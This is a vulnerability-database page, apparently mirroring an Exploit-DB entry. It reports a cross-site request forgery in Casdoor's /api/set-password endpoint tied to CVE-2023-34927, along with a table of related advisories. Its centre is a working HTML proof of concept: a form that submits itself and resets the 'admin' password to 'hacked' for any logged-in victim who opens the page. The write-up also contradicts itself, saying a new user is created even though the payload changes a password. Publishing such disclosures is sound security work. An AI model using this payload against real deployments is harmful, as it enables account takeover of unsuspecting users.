| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| CVE-2023-34927 | 22 Jun 202313:15 | โ | attackerkb | |
| Casdoor ่ทจ็ซ่ฏทๆฑไผช้ ๆผๆด | 22 Jun 202300:00 | โ | cnnvd | |
| CVE-2023-34927 | 22 Jun 202300:00 | โ | cve | |
| CVE-2023-34927 | 22 Jun 202300:00 | โ | cvelist | |
| Casdoor < v1.331.0 - '/api/set-password' CSRF | 2 Apr 202400:00 | โ | exploitdb | |
| Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF) | 16 Sep 202500:00 | โ | exploitdb | |
| Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF) | 29 Oct 202500:00 | โ | exploitdb | |
| EUVD-2023-1883 | 3 Oct 202520:07 | โ | euvd | |
| Casdoor Cross-Site Request Forgery vulnerability | 22 Jun 202315:30 | โ | github | |
| CVE-2023-34927 | 22 Jun 202313:15 | โ | nvd |
# Exploit Title: Casdoor v2.283.0 (2026-02-02) - Cross-Site Request Forgery (CSRF)
# Application: Casdoor
# Version: v2.283.0
# Date: 03/02/2026
# Exploit Author: Van Lam Nguyen
# Facebook: vanlam1412
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v2.283.0.zip
# Tested on: Windows
# CVE: CVE-2023-34927 ( latest yet to be assigned)
# POC: https://github.com/vanlam2001/csrf_casdoor
Overview
==================================================
Casdoor v2.283.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
Proof of Concept
==================================================
Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
<input name='userOwner' value='built-in' type='hidden'>
<input name='userName' value='admin' type='hidden'>
<input name='newPassword' value='hacked' type='hidden'>
<input type=submit>
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</html>
If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
userOwner: built-in
userName: admin
newPassword: hackedData
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation